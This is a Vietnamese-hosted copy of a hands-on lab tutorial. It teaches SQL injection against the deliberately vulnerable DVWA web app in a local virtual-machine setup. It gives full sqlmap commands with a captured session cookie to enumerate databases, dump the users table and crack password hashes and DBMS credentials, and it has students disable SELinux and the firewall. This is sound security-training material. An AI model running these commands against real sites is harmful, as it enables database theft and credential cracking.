Section 0. Background Information |
- What is Damn Vulnerable Web App (DVWA)?
- Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
- Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
- What is sqlmap?
- sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
- Pre-Requisite Labs
- Damn Vulnerable Web App (DVWA): Lesson 1: How to Install DVWA in Fedora 14
- Damn Vulnerable Web App (DVWA): Lesson 4: Using Metasploit with Command Execution (Required)
- Damn Vulnerable Web App (DVWA): Lesson 5: Using Tamper Data with crack_web_form.pl
- Damn Vulnerable Web App (DVWA): Lesson 6: Manual SQL Injection, John the Ripper
- References
- Lab Notes
- In this lab we will do the following:
- We will use sqlmap to obtain the following pieces of information:
- A list of Database Management Usernames and Passwords.
- A list of databases
- A list of tables for a specified database
- A list of users and passwords for a specified database table.
- We will use sqlmap to obtain the following pieces of information:
- In this lab we will do the following:
- Legal Disclaimer
- Tài liệu dùng cho mục đích học tập.
Section 1. Configure Fedora14 Virtual Machine Settings |
- Open Your VMware Player
- Instructions:
- On Your Host Computer, Go To
- Start --> All Program --> VMWare --> VMWare Player
- Instructions:
- Edit BackTrack Virtual Machine Settings
- Instructions:
- Highlight fedora14
- Click Edit virtual machine settings
- Instructions:
- Edit Network Adapter
- Instructions:
- Highlight Network Adapter
- Select Bridged
- Click on the OK Button.
Section 2. Login to Fedora14 |
- Start Fedora14 VM Instance
- Instructions:
- Start Up VMWare Player
- Select Fedora14
- Play virtual machine
- Instructions:
- Login to Fedora14
- Instructions:
- Login: student
- Password: <whatever you set it to>.
- Instructions:
Section 3. Open Console Terminal and Retrieve IP Address |
- Start a Terminal Console
- Instructions:
- Applications --> Terminal
- Instructions:
- Switch user to root
- Instructions:
- su - root
- <Whatever you set the root password to>
- Instructions:
- Get IP Address
- Instructions:
- ifconfig -a
- Notes:
- As indicated below, my IP address is 192.168.1.106.
- Please record your IP address.
- Instructions:
Section 4. Temporarily Disable SELINUX and Firewall |
- Start a Terminal Console
- Instructions:
- sestatus
- If SELinux status: is set to disabled OR if Current mode: is set to permissive, then skip the next steps, and Continue to the Next Section.
- If SELinux status: is set to enabled AND if Current mode: is set to enforcing, then Continue the next steps.
- Notes:
- In my case, I need to temporarily put selinux in permissive mode to demonstrate basic attacks on DVWA.
- Instructions:
- Place selinux in permissive mode
- Instructions:
- echo 0 > /selinux/enforce
- Placing a "0" in the enforce file, puts selinux in permissive mode.
- sestatus
- Notice that "Current mode:" changed to permissive.
- echo 0 > /selinux/enforce
- Instructions:
- Disable Firewall
- Instructions:
- service iptables save
- This is not really necessary, unless you have made recent changes to the firewall.
- service iptables stop
- This command disables the firewall.
- service iptables save
- Instructions:
Section 5. Configure BackTrack Virtual Machine Settings |
- Open Your VMware Player
- Instructions:
- On Your Host Computer, Go To
- Start --> All Program --> VMWare --> VMWare Player
- Instructions:
- Edit BackTrack Virtual Machine Settings
- Instructions:
- Highlight BackTrack5R1
- Click Edit virtual machine settings
- Instructions:
- Edit Network Adapter
- Instructions:
- Highlight Network Adapter
- Select Bridged
- Do not Click on the OK Button.
- Instructions:
Section 6. Login to BackTrack |
- Start BackTrack VM Instance
- Instructions:
- Start Up VMWare Player
- Select BackTrack5R1
- Play virtual machine
- Instructions:
- Login to BackTrack
- Instructions:
- Login: root
- Password: toor or <whatever you changed it to>.
- Instructions:
- Bring up the GNOME
- Instructions:
- Type startx
- Instructions:
Section 7. Open Console Terminal and Retrieve IP Address |
- Open a console terminal
- Instructions:
- Click on the console terminal
- Instructions:
- Get IP Address
- Instructions:
- ifconfig -a
- Notes:
- As indicated below, my IP address is 192.168.1.105.
- Please record your IP address.
- Instructions:
Section 8. Login to DVWA |
- Start Firefox
- Instructions:
- Click on Firefox
- Instructions:
- Login to DVWA
- Instructions:
- Start up Firefox on BackTrack
- Place http://192.168.1.106/dvwa/login.php in the address bar.
- Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
- Login: admin
- Password: password
- Click on Login
- Instructions:
Section 9. Set Security Level |
- Set DVWA Security Level
- Instructions:
- Click on DVWA Security, in the left hand menu.
- Select "low"
- Click Submit
- Instructions:
Section 10. Obtain PHP Cookie |
- SQL Injection Menu
- Instructions:
- Select "SQL Injection" from the left navigation menu.
- Instructions:
- Select Tamper Data
- Instructions:
- Tools --> Tamper Data
- Instructions:
- Start Tamper Data
- Instructions:
- Click on Start Tamper
- Instructions:
- Basic Injection
- Instructions:
- Input "1" into the text box.
- Click Submit.
- Note:
- The goal here is see the GET request being made to the CGI program behind the scenes.
- Also, we will use the "Surname" output with SQLMAP to obtain database username and password contents.
- Instructions:
- Tamper with request?
- Instructions:
- Make sure the Continue Tampering? textbox is unchecked.
- Then Click Submit
- Instructions:
- Copying the Referer URL
- Instructions:
- Select the second GET Request
- Right Click on the Referer Link
- Select Copy
- Instructions:
- Open Notepad
- Instructions:
- Applications --> Wine --> Programs --> Accessories --> Notepad
- Instructions:
- Paste Referer URL into Notepad
- Instructions:
- Edit --> Paste
- Instructions:
- Copying the Cookie Information
- Instructions:
- Right Click on the Cookie line
- Select Copy
- Instructions:
- Pasting the Cookie Information
- Instructions:
- Edit --> Paste
- Notes:
- Now you should have copied both the Referer and Cookie lines into Notepad. (See Picture)
- Instructions:
Section 11. Using SqlMap to Obtain Current User and Database |
- Verify sqlmap.py exists
- Instructions:
- cd /pentest/database/sqlmap
- ls -l sqlmap.py
- Instructions:
- Obtain Database User For DVWA
- Note:
- Obtain the referer link from (Section 10, Step 10), which is placed after the "-u" flag below.
- Obtain the cookie line from (Section 10, Step 10), which is placed after the "--cookie" flag below.
- Instructions:
- ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -b --current-db --current-user
- -u, Target URL
- --cookie, HTTP Cookie header
- -b, Retrieve DBMS banner
- --current-db, Retrieve DBMS current database
- --current-user, Retrieve DBMS current user
- ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -b --current-db --current-user
- Note:
- Do you want to keep testing?
- Instructions:
- keep testing? y
- skip payloads? y
- Instructions:
- Viewing Results
- Instructions:
- For the web application DVWA, the database name is "dvwa" and the programs that communicate with the database is "root@localhost";
- Instructions:
Section 12. Using SqlMap to Obtain Database Management Username and Password |
- NOTE: You must have completed Lesson 4 to see the db_hacker in Step 2.
- Obtain Database Management Username and Password
- Instructions:
- ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" --string="Surname" --users --password
- -u, Target URL
- --cookie, HTTP Cookie header
- -string, Provide a string set that is always present after valid or invalid query.
- --users, list database management system users
- --password, list database management password for system users.
- ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" --string="Surname" --users --password
- Instructions:
- Obtain Database Management Username and Password (Part 2)
- Instructions:
- Use Dictionary Attack? Y
- Dictionary Location? <Press Enter>
- Notes:
- Notice the password for username db_hacker was cracked.
- Instructions:
- Obtain db_hacker Database Privileges
- Instructions:
- ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -U db_hacker --privileges
- -u, Target URL
- --cookie, HTTP Cookie header
- -U, Specify database management user
- --privileges, list database management system user's privileges
- ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -U db_hacker --privileges
- Instructions:
- View Results: Obtain db_hacker Database Privileges
- Instructions:
- Notice that DBMS user "db_hacker" has administrative privileges
- Notice that "db_hacker" can log in from anywhere, via the "%" wildcard operator.
- Instructions:
Section 13. Obtain a list of all Databases |
- Obtain a list of all databases
- Note:
- Obtain the referer link from (Section 10, Step 10), which is placed after the "-u" flag below.
- Obtain the cookie line from (Section 10, Step 10), which is placed after the "--cookie" flag below.
- Instructions:
- ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" --dbs
- -u, Target URL
- --cookie, HTTP Cookie header
- --dbs, List database management system's databases.
- ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" --dbs
- Note:
- Review Results: Obtain a list of all databases
- Note:
- Notice that sqlmap supplies a list of available databases.
- Note:
Section 14. Obtain "dvwa" tables and contents |
- Obtain "dvwa" tables and contents
- Note:
- Obtain the referer link from (Section 10, Step 10), which is placed after the "-u" flag below.
- Obtain the cookie line from (Section 10, Step 10), which is placed after the "--cookie" flag below.
- Instructions:
- ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa --tables
- -u, Target URL
- --cookie, HTTP Cookie header
- -D, Specify Database
- --tables, List Database Tables
- ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa --tables
- Note:
- Viewing "dvwa" tables and content results
- Note:
- Notice sqlmap listed two tables: guestbook and users.
- Note:
- Obtain columns for table dvwa.users
- Instructions:
- ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa -T users --columns
- -u, Target URL
- --cookie, HTTP Cookie header
- -D, Specify Database
- -T, Specify the Database Table
- --columns, List the Columns of the Database Table.
- ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa -T users --columns
- Instructions:
- Viewing Results: columns for table dvwa.users
- Note:
- Notice that there are both a user and password columns in the dvwa.users table.
- Note:
- Obtain Users and their Passwords from table dvwa.users (Part 1)
- Instructions:
- ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa -T users -C user,password --dump
- -u, Target URL
- --cookie, HTTP Cookie header
- -D, Specify Database
- -C, List user and password columns
- --dump, Dump table contents
- ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa -T users -C user,password --dump
- Instructions:
- Obtain Users and their Passwords from table dvwa.users (Part 2)
- Instructions:
- Do you want to use the LIKE operator? Y
- Recognize possible HASH values? Y
- What's the dictionary location? <Press Enter>
- Use common password suffixes? y
- Instructions:
- Review Results: Users and their Passwords from table dvwa.users
- Notes:
- Notice how sqlmap nicely displays passwords for each user.
- Notes:
Section 15. Proof of Lab Using John the Ripper |
- Proof of Lab
- Instructions:
- Bring up a new terminal, see (Section 7, Step 1)
- cd /pentest/database/sqlmap
- find output/* -print | xargs ls -l
- date
- echo "Your Name"
- Replace the string "Your Name" with your actual name.
- e.g., echo "John Gray"
- Proof of Lab Instructions:
- Do a <PrtScn>
- Paste into a word document
- Email 2 CSIRT247@Gmail.Com
- Instructions:
Không có nhận xét nào:
Đăng nhận xét